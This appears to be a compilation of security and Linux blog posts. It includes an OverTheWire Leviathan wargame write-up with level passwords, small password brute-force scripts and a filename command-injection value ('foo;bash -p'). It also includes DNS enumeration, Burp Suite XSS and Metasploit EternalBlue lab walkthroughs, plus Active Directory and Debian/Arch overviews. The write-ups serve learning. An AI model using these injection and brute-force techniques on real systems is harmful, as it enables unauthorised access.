Introduction :

The Leviathan wargame is an online game powered by the OverTheWire community. This wargame doesn’t require any knowledge about programming, just some basic Linux commands.

This is a quick write-up of my solutions but, before you read that post, please, try your luck and do it yourself. Enjoy 🙂

leviathan 00 Solution

We have credentials :

• username: leviathan0
• password: leviathan0
• ssh server: leviathan.labs.overthewire.org with the port of 2223

Now just SSH into the server, we found the .backup The directory contains an HTML file, we use cat bookmarks.html | grep password

The password is : PPIfmI1qsA

leviathan 01 Solution

We have a setuid binary that checks or password, After I tried many most used passwords like “admin, password,12356, love, secret” nothing works

What is ltrace :

ltrace is a Linux command line that allows us to see dynamic library calls that a program makes during its execution.

Just run ltrace check , now just insert any random password like the following :

The binary compares any password if the password is equal to “sex” you get /bin/sh shell if not it said: Wrong password.

I used /bin/bash -i to switch from /bin/sh shell into /bin/bash for more stability.. The passowrd stored in /etc/leviathan_pass/leviathan2

The password is: mEh5PNl10e

Bonus :

Here is a Python script that brute force the password instead of using ltrace :

#!/usr/bin/python3

import os 
wordlist =['123456', '12345', '123456789', 'password', 'iloveyou', 'princess', '1234567', 'rockyou', '12345678', 'abc123', 'love', 'moka', 'time', 'sex', 'prince', 'football', ]
for i in wordlist:
    a=os.popen(f"echo {i} | /home/leviathan1/check")
    output = a.read()
    if "Wrong" in output:
        print(f"[-] Trying {i}")
    else:
        print(f"[+] Match Found  {i}".center(50,"-"))
        a.close
        break

leviathan 02 Solution

As usual we have setuid binary that check if we have permission to read the content of our selected file .

we run ltrace ./printfile /etc/leviathan_pass/leviathan3

To solve this just create directory in /tmp/level2 and do the following :

• create /tmp/leve2 directory
• create file in /tmp/level2/foo

Now just run ./printfile /tmp/level2/'foo;bash -p'

• executing the binnary wile the file argument which is foo and adding second command .
• bash -p tell linux to create bash shell with that user , As we know the binary owned by leviathan3

The password : Q0G8j4sakn

leviathan 03 Solution

We have a binary in the home directory that asks for a password, A correct password leads us into shell.

After using ltrace we see the following :

leviathan3@gibson:~$ ltrace ./level3 
__libc_start_main(0x80492bf, 1, 0xffffd504, 0 
strcmp("h0no33", "kakaka")                                                         = -1
printf("Enter the password> ")                                                     = 20
fgets(Enter the password> hello
"hello\n", 256, 0xf7e2a620)                                                  = 0xffffd2dc
strcmp("hello\n", "snlprintf\n")                                                   = -1
puts("bzzzzzzzzap. WRONG"bzzzzzzzzap. WRONG
)                                                         = 19
+++ exited (status 0) +++
leviathan3@gibson:~$

the function strcmp() used to compare to password , in this case comparing “hello” with “snlprintf” .

So we have now the password “snlprintf”

leviathan 04 Solution

I found a hidden directory called .trash in the home folder, We have bin binary which is owned by leviathan5.

Now just convert binary into ASCII I found an awesome site that converts binary into ASCII.

What is Binary Data:

The binary is 0 and 1 so every code, image, text, audio everything we write is converted automatically into 0 or 1 and stored and processed by a computer to give up the result.

What is ASCII:

ASCII is “American Standard Code for Information Interchange.” this means that it is a character encoder that assigns unique numbers (codes) to represent characters, for example:

• The ASCII code for the letter ‘A’ is 65.
• The ASCII code for the digit ‘0’ is 48.
• The ASCII code for the exclamation mark ‘!’ is 33. and so on

The password is : EKKlTF1Xqs

leviathan 05 Solution

As usual, we have steuid binary that opens the /tmp/file.log, we use the command ln -s to create a link for a file in this case /etc/leviathan_pass/leviathan5.

leviathan5@gibson:~$ ls
leviathan5
leviathan5@gibson:~$ ./leviathan5 
Cannot find /tmp/file.log
leviathan5@gibson:~$ ln -s /etc/leviathan_pass/leviathan6 /tmp/file.log
leviathan5@gibson:~$ ./leviathan5 
YZ55XPVk2l
leviathan5@gibson:~$

The password is YZ55XPVk2l

leviathan 06–07 Solution (last one )

We have a setuid binary that checks or password, After I tried many most used digit passwords like “0000,1234,4321,9999” nothing worked, so i decided to write the Python script :

#!/usr/bin/python3

import os
import sys
binary = "/home/leviathan6/leviathan6"
for i in range(0, 9999):
    data = str(i).zfill(4)
    command = os.popen(f"{binary} {data}")
    output = command.read()
    if "Wrong" in output:
        print(f"Trying : {data}")
    else:
        print(f"[+] Match found {output}")
        sys.exit(1)

Now after reaching 7123, the script hangs indicating that the right password is 7123 now just ran the binary agin with the password 7123 you will see the /bin/sh spawn

leviathan6@gibson:/tmp/aa$ cd ~
leviathan6@gibson:~$ ls
leviathan6
leviathan6@gibson:~$ ./leviathan6 7123
$ /bin/bash -i 
leviathan7@gibson:~$ cat /etc/leviathan_pass/leviathan7 
8GpZ5f8Hze
leviathan7@gibson:~$

I use cd ~ to change directory from /tmp/aa into /home/leviathan7/ .

The password is : 8GpZ5f8Hze

Introduction :

Hello everyone, and welcome to my blog! so today we gonna learn what is DNS and how DNS enumeration works in order to secure our home and organization network.

Have you ever wondered how DNS enumeration works? if not you are lucky today we gonna learn how DNS works in order to manipulate it right 🙂

What is DNS :

DNS stands for Domain Name System and provides a simple way for us to communicate with devices like smartphones, tablets, and servers on the internet without even remembering their IP.

An IP address is basically a set of 4-digit numbers like 192.168.1.1 ranging from 0–255 and looks like a house that has a unique address for sending mail directly to it.

When you want to visit a website, it’s not exactly convenient to remember this complicated set of numbers, and that’s where DNS helps.

Domain Hierarchy:

Root :

A root server is a nameserver in the Domain Name System whose role is to provide the addresses of top-level domain (TLD) servers

Top-level domain (TLD):

TLD is the last part of a domain name, for example, in the domain name thehackingmastery.org, the TLD is .org.

Top-level domains are basically used to identify various categories of websites, like .com for commercial websites, .org for non-profit organizations, .edu for educational, and so on.

There are many TLDs among them:

• .com for commercial website
• .net for network websites
• .org for non-profit organizations
• .edu for educational websites
• .gov for government websites
• .mil for military websites
• .aero for aviation websites
• .asia for Asian websites
• .info for information websites
• .museum for museum websites
• .me for personal websites
• .biz for business websites
• .coop for cooperative websites

TLDs are the most important part of the Domain Name System, which has the role of translating domain names like google.com into IP of 142.250.200.142. So when you type a domain name into your web browser, the DNS will look up the IP address of the website and direct your browser to that address.

Second-level domain (SLD):

The second-level domain is a domain that is directly below a top-level domain which is the root. For example, in thehackingmastery.org, an example is the second-level domain of the .org

Second-level domain commonly refers to the organization that registers the domain name called the registrar.

What is a Subdomain :

The subdomain is basically a domain that is a small part of the main domain. For example, let’s say you have an online store and once a user wants to purchase an item instead of going into the main site exmple.com he will be redirected to payment.exmple.com in this example the web application uses the subdomain shop.example.com to process the payment process.

hosts :

A host file is a file used to map domain names to IP addresses and can be used as an alternative to a DNS server.

127.0.0.1     localhost
255.255.255.255    broadcasthost
::1             localhost
223.145.12.73 thehackingmastery.org www.thehackingmastery.org

For Windows, the host file is located in :

C:\Windows\System32\Drivers\etc\hosts

In Linux : /etc/hosts

DNS Record

A Record

Used to resolve to IPv4 addresses, for example, 104.248.10.217

AAAA Record

Used resolve to IPv6 addresses, for example 1603:434:20::681a:be1

CNAME Record

This type of record is used to resolve from the main domain into other domains, for example, let’s say we have example.com online shop has the subdomain name store.exmple.com which returns a CNAME record shops.shopify.com. Another DNS request would then be made to shops.shopify.com immediately.

MX Record

These types of records are used to resolve to the address of the servers that handle the email for the domain you are querying

TXT Record

TXT records are free text fields where any text-based data can be stored. Those TXT records have multiple uses, but some common ones can be to list servers that have the authority to send an email this can help in the battle against spam and spoofed email.

DNS Enumeration:

DNS enumeration is a common technique used by hackers to gather information about target networks like IP addresses, IPV6 address mail servers, and so on, for this demonstration we gonna see the most used DNS enumeration tools

dig

For this demonstration, we gonna use dig on google.com

┌─[root@Intel]─[~]
└──╼ #dig google.com 

; <<>> DiG 9.18.16-1~deb12u1~bpo11+1-Debian <<>> google.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 20011
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
; COOKIE: 4167b39180ce7c431fab15f465480a0a20b875b739a62bff (good)
;; QUESTION SECTION:
;google.com.			IN	A

;; ANSWER SECTION:
google.com.		236	IN	A	142.250.200.142

;; Query time: 36 msec
;; SERVER: 192.168.1.1#53(192.168.1.1) (UDP)
;; WHEN: Sun Nov 05 22:34:05 +01 2023
;; MSG SIZE  rcvd: 83

As you see that google.com domain has an IP address of 142.250.200.142, we can also use the dig command to query for other types of DNS records like NS or TXT like the following :

This is for NS records:

host

host is a simple DNS enumeration utility used to perform DNS lookups similar to dig

┌─[root@Intel]─[~]
└──╼ #host google.com 
google.com has address 142.250.201.78
google.com has IPv6 address 2a00:1450:4003:80f::200e
google.com mail is handled by 10 smtp.google.com.

As you see the host command performs a query scan to A (IPV4), AAAA (IPV6), and mail by default

DNSEnum

It is a Perl script that gathers DNS information from a specified domain similar to dig and host command but it can also be used to to perform zone transfers and brute force subdomains.

DNSEnum is a discovery tool with multithread multi-function including nslookup, zone transfer, google scraping, reverse lookups, and finally domain brute force which makes DNSEum special then dig and host command.

Greate now to perform DNS enumeration with dnsenum just run the following :

dnsenum google.com

The output :

Host's addresses:
__________________

google.com.                              13       IN    A        142.250.200.142

Name Servers:
______________

ns3.google.com.                          1800     IN    A        216.239.36.10
ns1.google.com.                          1800     IN    A        216.239.32.10
ns2.google.com.                          1800     IN    A        216.239.34.10
ns4.google.com.                          1800     IN    A        216.239.38.10

Mail (MX) Servers:
___________________

smtp.google.com.                         245      IN    A        142.250.102.26
smtp.google.com.                         245      IN    A        142.250.27.26
smtp.google.com.                         245      IN    A        142.250.102.27
smtp.google.com.                         245      IN    A        142.250.27.27

Conclusion:

DNS enumeration is the most valuable technique for gathering information used by hackers and cyber security professionals about a domain, it has some potential risks such as leaking information from TXT records or performing denial of service. In that situation, you must use it at your own risk.

What is Active Directory :

Active Directory is basically a service provided by Microsoft that allows companies schools, universities, and corporations to manage and organize their network and resources. Active Directory essentially allows us to centralize all computers, servers, and users in one server instead of managing or configuring users, servers, and computers one by one, that is helpful because it saves our time as you know time equals money.

Advantages of Active Directory:

There are many reasons why organizations choose services like Active Directory. The main reason is Centralised identity management. That means users can log on and manage a variety of resources from one centralized place witch called the domain controller.

Administrators can easily create, delete, and disable users’ accounts in the domain controller which is the server that has the Active Directory installed on it. They can also set access permissions and control who can access specific resources or directories that increase security and create a secure environment.

Let’s imagine you are a student in school or university networks, you will usually be provided with a username and password that allow you to log in from any computers available on campus. Your credentials such as username and password are valid for all machines because whenever you input them on a machine you will be able to log in, this authentication will be automatically sent to the domain controller (the Active Directory server), which checks your credentials and validates whether your username and password are true or not. With Active Directory, your credentials don’t need to exist locally on each machine because they are sorted and available throughout the Active Directory network.

So basically in Active Directory teachers can allow or restrict students from accessing some applications or games in Windows clients or even accessing tick tock on university computers.

Active Directory Tools :

Server Manager:

Server Manager is basically a Windows server management tool that provides us with a centralized interface for managing almost all of its environment functions. Server Manager allows us administrators to perform multiple tasks related to server configuration, like monitoring, maintenance, and so on.

The Windows Server Manager tool allows us to install Active Directory, DNS, DHCP, Fax Server, and many more services with only a few clicks.

Active Directory Domain and Trusts:

Active Directory Domain and Trusts are normally used for managing relationships and trust between domains and forests in a Windows Server, so basically this tool allows administrators to manage domains and configure domain trees, and forest in settings.

Active Directory Module for Windows Powershell :

The Active Directory PowerShell is a set of cmd lines that make administrators run PowerShell commands in order to manage Active Directory from the PowerShell command line. These cmdlets are part of the Active Directory module that run command to add or remove users and groups and install new services like DNS DHCP from Active Directory Powershell.

Active Directory Sites and Services :

Is a service that allows admins to manage and configure the replication topology and site infrastructure in an AD environment witch it is a must-use tool to show and manage the physical structure of the Active Directory forest of each building.

Active Directory Users and Computers :

Active Directory Users and Groups provides a graphical user interface to configure and manage users, groups, computers, computers, and organizational units which is a set of small object containers that contain user services to make them easy to configure.

ADSI Edit :

ADSI stands for Active Directory Service Interfaces that allow IT administrators to display, edit, and hopefully create the object in Active Directory

It gives us a graphical user interface with an Active Directory database which allows us administrators to fully connect to different domains and domain controllers with the help of LDAP servers to perform various tasks related to directory services.

Main Components of Active Directory:

Domain:

Basically domain is a thing that connects users’ computers and other devices like printers to share files and communicate between devices in a network that is normally controlled by administrators using some security policy rules, the main goal is to centralize the management of all devices within the network.

Domain Controller:

Domain Controller is a server that an active directory was installed into it, Domain Controller allows users to log in to the cooperation domain to perform a certain action like sharing files over the network which makes administrators able to control them using some security policies.

Organizational Units :

Organizational units are something like manipulating containers, each container contains users, groups, and machines which makes it easier for the administration to make changes like adding or removing users from specific groups and so on.

Group Policy:

Groups Plocy is basically a set of rules and parameters that allows us administrators to control users, groups, and machines. For example, let’s say in university a teacher wants to block Microsoft Store (to not allow students to download games) from all computers connected in a domina “ST1.local”. With Group Policy the teacher can block Microsoft Store by selecting Local Group Policy Editor > User Configuration -> Administrative Templates -> Windows Components -> Store, and voila the Microsft Stor is blocked from all student computers.

Replication:

Replication means synchronization between the main Active Directory and other domain controllers affiliated with it, if the main active directory adds a new user called “john” then other domain controllers will add that user to their AD database.

Conclusion :

So Active Directory is an amazing service that keeps everything organized in the Windows Server network, which makes it easy for administrators to control everything within the network. It’s like a central hub that handles user, group, machine, web server, authentification, access permissions, resource management and so much more. Making the organization network work successfully in a secure environment.

What is Burp Suite?

Burp suite is a framework which is written in Java that allows us to interface and manipulate requests over a web application penetration.

Burp Suite had a pretty good reputation among the industry cybersecurity and hacking tools for hands-on web app security assessments. Burp Suite is also commonly used to penetrate mobile applications, it has some features that allow us to use APIs (Application Programming Interfaces) that power most mobile apps and web application

Burp Suite installation :

For Linux:

First, go into the Burp Suite download section, then download the community edition because it is free, we love free stuff right 🙂

Once you download the Burp Suite Package to install it just run the following :

┌─[lol@Intel]─[/tmp/Download]
└──╼ $chmod +x burpsuite_community_linux_v2023_10_3_6.sh 
┌─[lol@Intel]─[/tmp/Download]
└──╼ $./burpsuite_community_linux_v2023_10_3_6.sh 
Unpacking JRE ...
Starting Installer ...

Now a small window will prompt, just click next install and wait for the installation

For Windows :

As usual, once you download the Burp Suite Community install it by clicking into the Burp installer and running it as administrator, you will prompt a small window just click next, next, and install like in the previous Linux installation.

Installing the proxy extension :

We need a proxy extension because it allows us to forward any request we make in the browser directly to Burp suite software in order to manipulate requests and penetrate web applications.

In my case, I have a Firefox browser. Now just install the FoxyProxy extension, once you install it it looks like this:

To add the burp configuration just click option>add to copy my configuration, this allows you to connect the burp suite with the proxy extension so you turn it off whatever you want.

Installing Burp certificate :

Burp Suite certificate is a certificate that makes an easy to intercept and analyze encrypted HTTPS traffic during web pen testing.

Well, this certificate should be installed in your browser to make the burp suite work properly while intercepting HTTP and HTTPS requests.

To install it you need first to enable the burp option in the FoxyProxy extension like this :

Then start your Burp Suite application and type in your browser http://burpsuite/ then click CA Certificate to download the certificate

Finally, just install the burp ca certificate in Firefox by following this article

Components of Burp Suite

Proxy

Proxy module, acting as a door between the client and the web application. By using the Proxy section users can intercept HTTP and HTTPS traffic, logs, and history requests by this it provides a deep visibility into the communication between the user and web server.

The main goal of the proxy section is to find or identify bugs and vulnerabilities in order to fix them.

Intruder

The Intruder module allows to perform attacks on web applications. Whatever brute force using some desired wordlists or fuzzing,

It enables you to configure your preference attacks whose main goal is to send crafted HTTP and HTTPS requests over and over again by injecting multiple different selected payloads into predefined positions every time.

Intruder enables us as Pentesters to focus analysis of potential vulnerabilities by brute forcing and fuzzing certain parts of the web application server to see how the web application reacts thus we can detect or even exploit vulnerabilities.

Repeater

The repeater module allows you to manually send and modify HTTP requests from proxy requests to the Repater section doing that makes precision testing easier.

Using the Repeater helps to make changes in requests by crafting server-side attacks in web applications, which includes finding and exploiting vulnerabilities in order to secure the environment.

Scanner

The Scanner module provides us with an automated process of identifying security vulnerabilities in web applications usually by scanning for common vulnerabilities by implumenting Owasp’s top 10. Usually, Owsap focuses on critical vulnerabilities that are mostly exploited worldwide.

By scanning for common threats such as SQL injection, Server Side Template Injection, and cross-site scripting, is really helpful while doing vulnerability assembly

Decoder

The Decoder module in Burp Suite serves the provide a more sophisticated option to encode and decode data within web applications for example:

1. Perform URL decoding, then HTML decoding.
2. Edit the decoded data as you wish.
3. Reapply the HTML encoding, then the URL encoding.

Hands-on Practice

Great now after we learn how to use Bupr Suite tools as well as install the FoxyProxy extension to penetrate any web application and mobile, we gonna spawn a vulnerable web server from Tryhackme to intercept and manipulate requests. As a wise man said: “Practice makes perfect” ❤️‍🔥

Enumeration :

The first thing you gonna do is scan that IP using Nmap by using the following command :

nmap -sS -p- 10.10.31.189 | tee result.txt

• nmap -sS used to do stealth scan
• -p- tells Nmap to scan every port
• 10.10.31.189 is our vulnerable server IP address
• tee result.txt used to save the output of Nmap in a file called result.txt

PORT     STATE    SERVICE
22/tcp   open     ssh
80/tcp   open     http
9999/tcp open     abyss

HTTP Server :

Now first thing we gonna do is to run on the burp option in the FoxyProxy extension, by doing that we will be able to run the Burp Suite properly.

Great now refresh your tab you will prompted in Burp Suite like that :

As we see in the picture above this how a request looks like, let’s explain what we have here :

• GET / used to fetch the content of the root in the web application, usually index.hml or index.php.
• Host is the IP address of the target server
• User-Agent is the name of your browser, in my case I use Firefox
• Accept tells the webserver to accept text, images, HTML, and so on

You can read more about request headers and how it works by clicking here

Exploitation :

As a web pentest, you must check for every page in the web application to see if there are any hidden bugs, the Support looks suspicious to me, let’s test it out 🙂

Let’s add contact information and see what web application react.

That is interesting as we can manipulate the email section to see if it is vulnerable to XSS. Cross-site scripting is a vulnerability that allows a hacker to inject malicious Javascript payload to non-sanitized input like search bar contact forum, and so on.

To do this let’s Intercept the support forum again and add our malicious payload

Our XSS payload is telling the web application to say “hacked” just to test if it is vulnerable or not. Now forward this request and voila

Now we confirm that the server is vulnerable to XSS, let’s see if the web application is vulnerable to HTML injection, HTML injection is a vulnerability that allows a hacker to inject HTML code in non-sanitized input like search bar, comment, and support forms, and so on.

We use the h1 attribute to make a title called “Pwned 1337” in the email section which is likely not sanitized.

Conclusion :

Burp Suite is a powerful tool that allows cyber security professionals to identify flow or vulnerability in web applications by fuzzing or brute forcing certain locations within the webserver to catch hidden vulnerabilities like XSS ( Cross-site scripting ), SQL injection, Server Side Template injection, and more critical vulnerability, this java tool can literally manipulate any request header and data by using the decoder section which can encode or decode data multiple time and forward the request into a web application to see how the server react to secure the web application from malicious attack.

Introduction :

Metasploit is the most widely used exploitation framework in pen testing or red teaming. Metasploit is ruby ruby-based exploitation tool that is used to check for vulnerabilities in networks, and systems, in order to fix them before bad guys.

Metasploit had two versions: Metasploit Pro, Metasploit framework

• Metasploit Pro: Had many benefits including facilitating the automation and management of tasks by using the Graphical User Interface (GUI)
• Metasploit Framework: It is an open source that uses only a command line interface (CLI).

The Metasploit Framework has multiple tools that allow information gathering, scanning, exploitation, exploit development, post-exploitation, and more. The main usage of the Metasploit Framework focuses on penetration, vulnerability research, and exploit development.

Component of Metasploit :

Msfconsole

It is a command line interface for Metasploit which allows us to access and control various modules, payloads, and exploits.

Armitage

It is a graphical user interface of Metasploit that interface provides a more user-friendly way to interact with Metasploit and perform multiple tasks including managing targets and launching post exploitation attacks.

Exploits

exploits are malicious code that take over a target system by taking advantage of a vulnerability.

├── aix
├── android
├── apple_ios
├── bsd
├── bsdi
├── dialup
├── firefox
├── freebsd
├── hpux
├── irix
├── linux
├── mainframe
├── multi
├── netware
├── openbsd
├── osx
├── qnx
├── solaris
├── unix
└── windows

Payloads

Payloads are small pieces of code that are injected into a compromised system after an exploit is successful. They serve an attacker with countless options such as remote control, data exfiltration, and so on.

Metasploit can offer plenty of its payloads, including setting up reverse shells and interpreter sessions.

── adapters
├── singles
├── stagers
└── stages

Auxiliary Modules:

Auxiliary modules are used for scanning, fingerprinting, information gathering, and brute force attacks over networks, services, and software in Linux, windows, and Mac

├── admin
├── analyze
├── bnat
├── client
├── cloud
├── crawler
├── docx
├── dos
├── fileformat
├── fuzzers
├── gather
├── parser
├── pdf
├── scanner
├── server
├── sniffer
├── spoof
├── sqli
├── voip
└── vsploit

Post Exploitation

Once a system is compromised, this module allows attackers and pen testers to perform many tasks like privilege escalation, lateral movement, and data exfiltration with high-privilege

├── admin
├── analyze
├── bnat
├── client
├── cloud
├── crawler
├── docx
├── dos
├── fileformat
├── fuzzers
├── gather
├── parser
├── pdf
├── scanner
├── server
├── sniffer
├── spoof
├── sqli
├── voip
└── vsploit

Shellcode

It is a small piece of code that is injected into the vulnerable and exploited system’s memory as part of a payload. It is responsible for executing specific actions on the compromised system, such as spawning a shell, privilege escalation, post-exploitation, and so on.

Encoders

Encoders are typically a method, tools, or scripts used to obfuscate or encode malicious code like payloads and shellcodes in order to evade detection by antivirus software, and IDS “Intrusion detection system”

├── cmd
├── generic
├── mipsbe
├── mipsle
├── php
├── ppc
├── ruby
├── sparc
├── x64
└── x86

Hands-on practice

Awesome now that we know the component of Metasploit and how it works let’s apply it to this vulnerable machine.

Enumeration :

What enumeration means is to scan or gather information about any target we had permission to by using Nmap, if you don’t know what Nmap is just complete the Nmap room in Tryhackme.

We run in our terminal the following : nmap -sS -sC -Pn 10.10.90.251

• Nmap is used to scan for open ports on the target machine in this case is a Windows server
• -sS Tells Nmap to perform a SYN scan.
• -sC allow Nmap to run the default script
• -Pn 10.10.90.251 tells Nmap to scan our target without DNS checking

Starting Nmap 7.93 ( https://nmap.org ) at 2023-10-27 00:46 +01
Stats: 0:00:06 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 35.57% done; ETC: 00:47 (0:00:09 remaining)
Nmap scan report for 10.10.90.251
Host is up (0.11s latency).
Not shown: 991 closed tcp ports (reset)
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49159/tcp open  unknown

Host script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: JON-PC, NetBIOS user: , NetBIOS MAC: 02b850a3d2ef (unknown)
| smb2-time: 
|   date: 2023-10-26T22:45:32
|_  start_date: 2023-10-26T22:40:57
|_clock-skew: mean: 38m26s, deviation: 2h53m12s, median: -1h01m34s
| smb2-security-mode: 
|   210: 
|_    Message signing enabled but not required
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: Jon-PC
|   NetBIOS computer name: JON-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2023-10-26T17:45:32-05:00

Nmap done: 1 IP address (1 host up) scanned in 93.57 seconds

As you see we have a lot of information including ports and their version and type of operation system. you may ask what Metasploit does with this, the answer is to find a vulnerability on the Windows server right 🙂

Now to start the Metasploit firmware just run msfconsole in your terminal and run the following command :

So basically eternalblue is a vulnerability in samba share in Windows which was exploited in 2017 by hackers used to create ransomware called wannacry which affected more than 200,000 Windows in the world Wilde.

As you see we use the options to see the choices we have in order to exploit this vulnerability

• RHOSTS: Is the target machine in this case, it is a Windows server
• RPORT : The port that vulnerable software runs through, in this case, is the Samba server
• SMBUser: The username of samba share
• SMBPass: The password obviously
• LHOST: The attacker IP address, in this case, is tun0 because we use the Tryhackme VPN
• LPORT: Our desired prot the spawn the shell through

Now type exploit to start the exploit in order to get the Meterpreter shell

Boom now you can do whatever you want in this Windows client, for example, you can run sysinfo to get more information about the user and his operating system like the following :

Or your moves from Meterpreter session into running the cmd.exe command by running the shell

(Meterpreter 1)(C:\Windows\system32) > shell 
Process 2948 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>

The funny is you can take screenshots from dark-pc by running screenshot in Meterpreter session

The Screenshot :

What is Debian Linux ?

Debian is a well known open source Linux distribution that has earned a reputation for its stability, security, and adaptability. Ian Murdock founded it in 1993, and it has since grown into a large community driven project with thousands of developers and contributors from all over the globe. To handle software packages and updates, Debian employs the Debian package management system (dpkg) and the Advanced Packaging Tool (APT). It also supports a wide variety of hardware architectures and has an official repository with over 59,000 software packages. Debian is well known for its strict adherence to free software ideals and commitment to the GNU Project’s principles. Its development is driven by a volunteer community who work on different parts of the distribution, such as packaging and testing, as well as documentation and support.

based on the Linux kernel and includes a variety of software apps already installed, such as web browsers, office suites, multimedia tools, and more. Its package administration system, APT, makes it simple to install, remove, and update software packages. Debian is supported by a big community of developers and volunteers who collaborate to keep the system stable and up to date. Overall, Debian is known and trusted operating system that continues to serve as a solid foundation for many users’ computing requirements.

Debian values security, with daily security updates and patches, as well as features like SELinux and AppArmor that help prevent unauthorized access and defend against malware and other threats. Furthermore, Debian is highly customizable and can be adapted to plenty of use cases and tastes. It is widely used by individuals, businesses, educational institutions, and governments all over the globe, and it has a solid reputation for stability and dependability.

Overall, Debian is a strong and versatile operating system that has contributed significantly to the open source software community.

What is Arch Linux ?

Arch Linux is a free and open source Linux distribution famous for its ease of use, adaptability, and minimalism. It is a rolling release distribution, which means that rather than having specific releases with set software versions, it constantly updates its packages to provide users with the most recent software versions.

Arch Linux is lightweight and configurable, with a focus on simplicity and individual control. Pacman is a package management system that makes it simple to install, update, and handle software packages. Furthermore, Arch Linux is well known for its extensive documentation, which includes detailed directions on how to set up and customize the system to meet individual requirements.

rch Linux, unlike many other Linux distributions, does not include a graphical installer or a configured desktop experience. Instead, users must install and configure the system themselves, which can be intimidating for some users but offers a high level of flexibility and control over the system.

Arch Linux is popular among coders and advanced users who value its adaptability and customizability. It is popular for its speed, stability, and dependability, and its minimalistic approach makes it an excellent option for operating on older or less powerful hardware. Overall, Arch Linux is a well known and respected Linux distribution that gives users extensive control and customization over their machine.

Difference between Debian and Arch:

Debian has been near for over two decades and is a stable and dependable distribution. It is popular for focusing on security and stability, and its applications are thoroughly evaluated before being added to the official repositories. Debian has a big and active community, and it provides a diverse set of software packages for various use cases.

Arch, on the other hand, is a more modern distribution that aims to provide a straightforward, lightweight system that can be customized to suit the requirements of the user. Arch’s philosophy is to keep things simple and to provide the user with a basic set of tools that enable them to build their system from the ground up.

The package management method is one of the most noticeable differences between Debian and Arch. Debian employs the Advanced Package Tool (APT), an effective and user friendly software package management system. APT simplifies the installation, updating, and removal of packages while also ensuring that dependencies are taken care of properly.

Arch, on the other hand, uses the Pacman package manager, which is a more basic and command line based system. Pacman is known for being fast and effective, and it enables users to install and update packages quickly. It does, however, require more manual configuration than APT and does not always manage dependencies as well as APT.

The release schedule of Debian and Arch is another difference. Debian has a steady and slow release cycle, with significant releases every few years. This method guarantees that the distribution is stable and reliable, but it may also mean that some software packages are now out of present. Arch, on the other hand, has a rolling release schedule, which means that updates are constantly released and users always have the most up to date software.

In terms of user experience, Debian is usually considered to be more user friendly as well as simpler to use out of the box. Its installer is simple, and its default desktop experience (GNOME) is polished and simple to use. Arch, on the other hand, necessitates more preparation and configuration to get started. The installer is simple, and the user must install and setup the desktop environment, drivers, and other necessary tools themselves.

Finally, Debian and Arch are two very distinct Linux distributions that cater to very different user types. Debian is a stable and dependable distribution with a large number of software packages.

Conclusion

Debian and Arch are two famous Linux distributions that take very different approaches and have very different philosophies. Debian has been around since 1993 and is a stable, dependable, and popular distribution. It is well known for its strict adherence to free software ideals and big, well maintained software package repositories. Arch, on the other hand, is a more adaptable, customizable version aimed at advanced users who prefer a hands on approach to Linux. It has a minimalist philosophy and a rolling release model, which means that software updates are published on a regular basis and users have access to the most recent software versions. While Debian is perfect for those who value stability and usability.

Experienced users have come to appreciate the freedom and beauty of Arch Linux, a potent, lightweight, and highly flexible operating system. In opposition to the majority of other Linux distributions, it uses a rolling release plans, which means that it is constantly updated with the most recent software releases, providing that users constantly have access to the best tools and features.
The simplicity of Arch Linux is one of its most unique characteristics. With only the basic components required for a usable operating system, it is meant to be as lean and efficient as possible. This means that users are in charge of setting up and installing any necessary additional software and components.
Also, Arch Linux has earned a reputation for its strong package management

Users can quickly install and manage software packages from third party sources as well as from the official Arch Linux repository through the use of the package manager, known as Pacman. Since Pacman is a command line tool, some users may find it scary at first. However, once you get used to it, Pacman is simple to use and powerful.

The most important aspect of the distribution is the Arch Linux community. Passionate about their operating system, Arch Linux users often give back to the community by developing and maintaining software packages, producing documentation, and serving other users with problem solving. The Arch Linux wiki is a fantastic tool for users of all skill levels because it offers comprehensive documentation on how to install, configure, and utilize the operating system and each of its components.

In general, experienced Linux users who appreciate adaptability, personalization, and a minimalist desktop style might want to think about switching to Arch Linux. Users of the distribution have access to a powerful, effective, and highly flexible operating system that can be adjusted to suit their unique requirements. It is a top option for users who wish to stay up to date with the most recent developments in Linux technology due to its active community, solid package management system, and rolling release strategy.

However, using Arch Linux could have certain disadvantages. First off, because the distribution is so basic, users who are unfamiliar with Linux or who do not want to put in the time and effort to install and modify their system may not find it to be the best option. This because it uses a rolling release structure, there is a chance that upgrades could often affect the stability of the system. Following standard practices for updating the system, such as performing routine backups and testing updates in a virtual machine before installing them on the primary system, can help to reduce this risk.

The benefits of using Arch Linux

The simplicity and popularity of Arch Linux among those who love it have not gone ignored, in fact, there are numerous important factors that led to its popularity among users. Below, we will list some of Arch Linux’s features:

1. You Are Free to Build Your Own PC

You have the freedom to create your own PC when using Arch Linux, which is one of its most significant advantages. Arch Linux is a do it yourself operating system which can be installed on almost any computer, unlike many other Linux distributions that are already configured on specified hardware. This enables you to select the precise hardware components you desire, verifying that your system is appropriate for what you want.

You have complete control over every part of the PC you build to run Arch Linux, from the processor and chipset to the graphics card and storage disks. With this kind of freedom, you may design a system that is ideal for your particular purpose, whether it is for software development, video editing, or gaming.

Additionally, building your own PC might be a cost effective choice, as you can select components that suit within your budget. For customers who are on a small budget but yet want a reliable and powerful system, this can be extremely helpful.

2-The Arch Linux User Repository

